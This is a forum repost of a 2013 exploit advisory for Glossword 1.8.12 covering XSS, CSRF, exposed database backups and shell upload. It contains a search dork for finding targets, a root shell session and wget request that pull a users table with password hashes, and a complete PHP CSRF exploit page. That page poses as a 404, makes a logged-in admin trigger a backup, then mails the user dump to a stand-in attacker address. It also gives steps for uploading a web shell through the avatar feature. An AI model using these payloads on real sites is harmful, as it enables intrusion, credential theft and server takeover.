Praetorian503 Posted February 5, 2013 Report Posted February 5, 2013 Glossword version 1.8.12 suffers from database backup disclosure, cross site request forgery, cross site scripting, and remote shell upload vulnerabilities.===================================================Vulnerable Software: Glossword 1.8.12Tested version: Glossword 1.8.12 Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.12/Vulns: XSS && Database Backup Disclosure && CSRF && Shell upload.Dork: Powered by Glossword 1.8.12 ===================================================Tested On: Debian squeeze 6.0.6Server version: Apache/2.2.16 (Debian)Apache traffic server 3.2.0MYSQL: 5.1.66-0+squeeze1PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)Copyright (c) 1997-2009 The PHP GroupZend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologieswith Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH===================================================About vulns:XSShttp://hacker1.own/glosslatest/glossword/1.8/gw_admin.php?a="><script>alert(1);</script>&t=settings===================================================Database Backup disclosure:root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# grep 'umask' /etc/pam.d/common-sessionsession optional pam_umask.so umask=0067root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# umask -Su=rwx,g=x,o=# NOTE 1: Notice database backups chmod'ed to 777 by script## NOTICE 2: BELOW database backups is accessible via HTTP REQUESTS #root@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# ls -liashtotal 1.1M65345 4.0K drwxrwxrwx 2 hacker1user hacker1user 4.0K Feb 3 08:41 .60499 4.0K drwxr-xr-x 3 hacker1user hacker1user 4.0K Feb 3 08:40 ..65347 68K -rwxrwxrwx 1 hacker1user hacker1user 64K Feb 3 08:40 backup_gwnew_abbr_phrase.sql65346 12K -rwxrwxrwx 1 hacker1user hacker1user 9.8K Feb 3 08:40 backup_gwnew_abbr.sql65367 4.0K -rwxrwxrwx 1 hacker1user hacker1user 402 Feb 3 08:40 backup_gwnew_auth_restore.sql65359 4.0K -rwxrwxrwx 1 hacker1user hacker1user 304 Feb 3 08:40 backup_gwnew_captcha.sql65350 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.3K Feb 3 08:40 backup_gwnew_component_actions.sql65349 8.0K -rwxrwxrwx 1 hacker1user hacker1user 6.2K Feb 3 08:40 backup_gwnew_component_map.sql65348 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.7K Feb 3 08:40 backup_gwnew_component.sql65365 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:40 backup_gwnew_custom_az_profiles.sql65364 36K -rwxrwxrwx 1 hacker1user hacker1user 33K Feb 3 08:40 backup_gwnew_custom_az.sql65368 240K -rwxrwxrwx 1 hacker1user hacker1user 234K Feb 3 08:41 backup_gwnew_dict_example.sql65351 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.6K Feb 3 08:40 backup_gwnew_dict.sql65374 268K -rwxrwxrwx 1 hacker1user hacker1user 263K Feb 3 08:41 backup_gwnew_history_terms.sql65363 4.0K -rwxrwxrwx 1 hacker1user hacker1user 2.6K Feb 3 08:40 backup_gwnew_import_sessions.sql65369 4.0K -rwxrwxrwx 1 hacker1user hacker1user 326 Feb 3 08:41 backup_gwnew_map_user_to_dict.sql65370 24K -rwxrwxrwx 1 hacker1user hacker1user 23K Feb 3 08:41 backup_gwnew_map_user_to_term.sql65353 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.3K Feb 3 08:40 backup_gwnew_pages_phrase.sql65352 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.1K Feb 3 08:40 backup_gwnew_pages.sql65354 4.0K -rwxrwxrwx 1 hacker1user hacker1user 485 Feb 3 08:40 backup_gwnew_search_results.sql65355 4.0K -rwxrwxrwx 1 hacker1user hacker1user 538 Feb 3 08:40 backup_gwnew_sessions.sql65356 8.0K -rwxrwxrwx 1 hacker1user hacker1user 4.2K Feb 3 08:40 backup_gwnew_settings.sql65357 4.0K -rwxrwxrwx 1 hacker1user hacker1user 321 Feb 3 08:40 backup_gwnew_stat_dict.sql65358 4.0K -rwxrwxrwx 1 hacker1user hacker1user 599 Feb 3 08:40 backup_gwnew_stat_search.sql65373 8.0K -rwxrwxrwx 1 hacker1user hacker1user 8.0K Feb 3 08:41 backup_gwnew_theme_group.sql65371 260K -rwxrwxrwx 1 hacker1user hacker1user 256K Feb 3 08:41 backup_gwnew_theme_settings.sql65372 4.0K -rwxrwxrwx 1 hacker1user hacker1user 1.5K Feb 3 08:41 backup_gwnew_theme.sql65361 4.0K -rwxrwxrwx 1 hacker1user hacker1user 908 Feb 3 08:40 backup_gwnew_topics_phrase.sql65360 4.0K -rwxrwxrwx 1 hacker1user hacker1user 761 Feb 3 08:40 backup_gwnew_topics.sql65362 4.0K -rwxrwxrwx 1 hacker1user hacker1user 3.2K Feb 3 08:40 backup_gwnew_users.sql65366 4.0K -rwxrwxrwx 1 hacker1user hacker1user 949 Feb 3 08:40 backup_gwnew_virtual_keyboard.sql65375 32K -rwxrwxrwx 1 hacker1user hacker1user 29K Feb 3 09:03 backup_gwnew_wordlist.sql65376 48K -rwxrwxrwx 1 hacker1user hacker1user 46K Feb 3 08:41 backup_gwnew_wordmap.sqlroot@debian:/etc/apache2/htdocs/hacker1/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03# cd /tmproot@debian:/tmp# wget --user-agent="BACKUP DISCLOSURE EXAMPLE" http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sql && cat backup_gwnew_users.sql--2013-02-03 09:13:17-- http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/backup_gwnew_users.sqlResolving hacker1.own... 127.0.0.1Connecting to hacker1.own|127.0.0.1|:80... connected.HTTP request sent, awaiting response... 200 OKLength: 3184 (3.1K) [text/plain]Saving to: “backup_gwnew_users.sql”100%[======================================================================================>] 3,184 --.-K/s in 0s2013-02-03 09:13:17 (13.7 MB/s) - “backup_gwnew_users.sql” saved [3184/3184]SET NAMES 'utf8';DROP TABLE IF EXISTS `gwnew_users`;CREATE TABLE `gwnew_users` ( `id_user` int(10) unsigned NOT NULL AUTO_INCREMENT, `login` varbinary(128) NOT NULL, `password` char(32) NOT NULL, `is_active` tinyint(1) unsigned NOT NULL DEFAULT '1', `is_multiple` tinyint(1) unsigned NOT NULL DEFAULT '0', `is_show_contact` tinyint(1) unsigned NOT NULL DEFAULT '1', `date_reg` int(10) unsigned NOT NULL DEFAULT '0', `date_login` int(10) unsigned NOT NULL DEFAULT '0', `int_items` int(10) unsigned NOT NULL DEFAULT '0', `user_fname` varbinary(64) NOT NULL, `user_sname` varbinary(64) NOT NULL, `user_email` varchar(255) NOT NULL, `user_perm` blob NOT NULL, `user_settings` blob NOT NULL, PRIMARY KEY (`id_user`)) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;INSERT INTO `gwnew_users` VALUES ('1','guest','084e0343a0486ff05530df6c705c8bb4','1','0','0','0','1359897241','1','Guest','','guest@localhost.tld','a:0:{}',0x613a343a7b733a363a226c6f63616c65223b733a333a22656e67223b733a383a226c6f636174696f6e223b733a303a22223b733a31303a22676d745f6f6666736574223b733a313a2230223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);INSERT INTO `gwnew_users` VALUES ('2','admin','01a8e7efac66ec52b417af55940e4719','1','0','1','1359915020','1359898817','23','Admin User',' ','admin@hacker1.own','a:16:{s:8:\"IS-EMAIL\";i:1;s:8:\"IS-LOGIN\";i:1;s:11:\"IS-PASSWORD\";i:1;s:8:\"IS-USERS\";i:1;s:13:\"IS-TOPICS-OWN\";i:1;s:9:\"IS-TOPICS\";i:1;s:12:\"IS-DICTS-OWN\";i:1;s:8:\"IS-DICTS\";i:1;s:12:\"IS-TERMS-OWN\";i:1;s:8:\"IS-TERMS\";i:1;s:15:\"IS-TERMS-IMPORT\";i:1;s:15:\"IS-TERMS-EXPORT\";i:1;s:13:\"IS-CPAGES-OWN\";i:1;s:9:\"IS-CPAGES\";i:1;s:15:\"IS-SYS-SETTINGS\";i:1;s:10:\"IS-SYS-MNT\";i:1;}',0x613a31393a7b733a31303a226176617461725f696d67223b733a31373a22313335393839373436315f73312e706870223b733a31323a226176617461725f696d675f79223b4e3b733a31323a226176617461725f696d675f78223b4e3b733a31303a22676d745f6f6666736574223b733a313a2233223b733a393a2269735f68746d6c6564223b733a313a2231223b733a31333a2269735f7573655f617661746172223b693a303b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a383a226c6f636174696f6e223b733a303a22223b733a31313a2276697375616c7468656d65223b733a393a2267775f73696c766572223b733a31323a2264696374696f6e6172696573223b613a303a7b7d733a363a2269735f647374223b693a303b733a31313a22646174655f666f726d6174223b733a31333a2246206a2c20592c20673a692061223b733a31333a22696d706f72745f666f726d6174223b733a333a22637376223b733a32313a22696d706f72745f69735f636865636b5f6578697374223b693a303b733a31393a22696d706f72745f69735f6f7665727772697465223b693a303b733a32323a22696d706f72745f69735f7370656369616c6368617273223b693a303b733a32303a22696d706f72745f69735f77686974657370616365223b693a303b733a32313a22696d706f72745f69735f636f6e766572745f657363223b693a303b733a32303a22696d706f72745f69735f726561645f6669727374223b693a303b7d);INSERT INTO `gwnew_users` VALUES ('3','test','098f6bcd4621d373cade4e832627b4f6','1','0','1','1359898749','0','0','','','','a:0:{}',0x613a333a7b733a383a226c6f636174696f6e223b733a303a22223b733a31313a226c6f63616c655f6e616d65223b733a373a22656e2d75746638223b733a31323a2264696374696f6e6172696573223b613a303a7b7d7d);root@debian:/tmp#In this example: backup_gwnew_users.sql gwnew_ is my custom table prefix.In fact while installing script it is = gw_Feel free to create your own bruteforcer:Format is:sql_backup_2013-02Feb-03/backup_{TABLE_PREFIX}_users.sqlAlso table prefix is not panacea ANYMORE.If Directory index is not forbidden on remote site/server you can see whole : site.tld/gw_export/sql_backup_2013-02Feb-03/directory structure and you can download it in that way.Ok this is not end.Theris another vector of exploitation using CSRF vulnerability.Here we go (CSRF+database dump stealer)Simply trick the logged in admin to visit malicious page.If the attack successfull it will silenty @mail to you victim's database.==============EXPLOIT BEGINS=====================<?phperror_reporting(0);//echo '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d');/*http://hacker1.own/glosslatest/glossword/1.8/gw_temp/gw_export/sql_backup_2013-02Feb-03/*///exit;define("TARGETSITE",'http://hacker1.own/glosslatest/glossword/1.8/');define("HACKERMAIL",'hacker@g00glemail.tld');define("STANDARDTABLEPREFIX",'gw_');header('Status: 404 Not found!');echo '<h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . str_repeat(PHP_EOL,500);for($i=1;$i<8;$i++){echo '<img src="' . TARGETSITE . '/gw_admin.php?a=maintenance&t=settings&w1=8&w2=' . $i . '&w3=" heigth="0" width="0" />' .PHP_EOL;}$data=TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';//echo TARGETSITE . '/gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . '/backup_' . STANDARDTABLEPREFIX .'users.sql';exit;//@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . TARGETSITE . /gw_temp/gw_export/sql_backup_'. date('Y-mM-d') . $s=file_get_contents($data);/*uncomment if you want to save on your server # file_put_contents(md5(rand(1,1000)) . '.txt',$s);*/@mail(HACKERMAIL,'Hello xDuMpS!','CHKOUT' . htmlspecialchars($data) . PHP_EOL . htmlspecialchars($s) .PHP_EOL);exit;?>================EXPLOIT ENDS HERE======================Ok now about shell upload vulnerability (requires administrative access to site)After gain access to admin panel (in eg via XSS or using backup disclosure)Go to:http://site.tld/gw_admin.php?a=edit-own&t=usersUpload your shell using: Avatar settings tab.Don't bother about: (*The following file types are allowed: jpg, png*) because it is wrong information.Trace it like this,access it and travel xDhttp://s006.radikal.ru/i215/1302/27/d4b52ad33b39.pngBackup image: http://oi47.tinypic.com/crsde.jpg================================================ KUDOSSSSSSS================================================packetstormsecurity.orgpacketstormsecurity.compacketstormsecurity.netsecurityfocus.comcxsecurity.comsecurity.nnov.rusecurtiyvulns.comsecuritylab.rusecunia.comsecurityhome.euexploitsdownload.comosvdb.comwebsecurity.com.ua1337day.comitsecuritysolutions.orgto all Aa Team + to all Azerbaijan Black HatZ+ *Especially to my bro CAMOUFL4G3 *To All Turkish HackersAlso special thanks to: ottoman38 & HERO_AZE================================================/AkaStepSource: PacketStorm Quote